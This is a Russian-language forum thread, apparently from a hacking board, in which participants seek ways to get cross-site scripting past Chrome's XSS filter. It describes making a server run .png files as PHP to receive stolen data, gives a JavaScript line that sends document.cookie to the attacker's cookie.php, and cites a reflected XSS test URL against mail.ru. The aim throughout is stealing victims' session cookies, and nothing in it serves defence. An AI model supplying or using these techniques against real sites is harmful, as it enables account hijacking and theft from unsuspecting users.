Может есть вариант справиться с фильтрами Хрома ,описано здесь Bypassing Chrome’s Anti-XSS filter

http://blog.securitee.org/?p=37 но этот баг уже пофиксили )))

ещё один.. указывая в .htaccess AddType application/x-httpd-php .png ты всего лишь указываешь серверу обрабатывать файлы .png как php, затем в «картинке» нужно написать свой «ядовитый» код но в качестве принимающей стороны, тоесть на php, а не js. что-то вроде

а жертве передать уже свой js со ссылкой на этот файл, где через гет переменную с передать document.cookie. а передать просто файл в котором у тебя написан твой js не прокатит, так как внутри него ты будешь пытаться записать cookie с того же домена на котором он расположен.

Ты наверное имел ввиду ,такой пример:

js:

document.write("/cookie.php?c=" + document.cookie +"\">");

cookie.php:

javascript-ы подгружаемые с моего сайта во время выполнения XSS не срабатывают (независимо какой код в них)

Например в адресной строке Хрома ввожу :

http://www.mail.ru/jsearch/?s=">

file.js -подгружается в Хром (видно по обменам пакетами в СommonView) , но не срабатывает . Может из-за защиты ,

Установленной в последних версиях

В опере и в мозиле эта xss-ка "легко" срабатывает . У кого нибудь есть простой пример xss в Хроме...наблюдается тенденция опережения среди браузеров - Chrome

Подскажите еще работает метод или мб другой есть?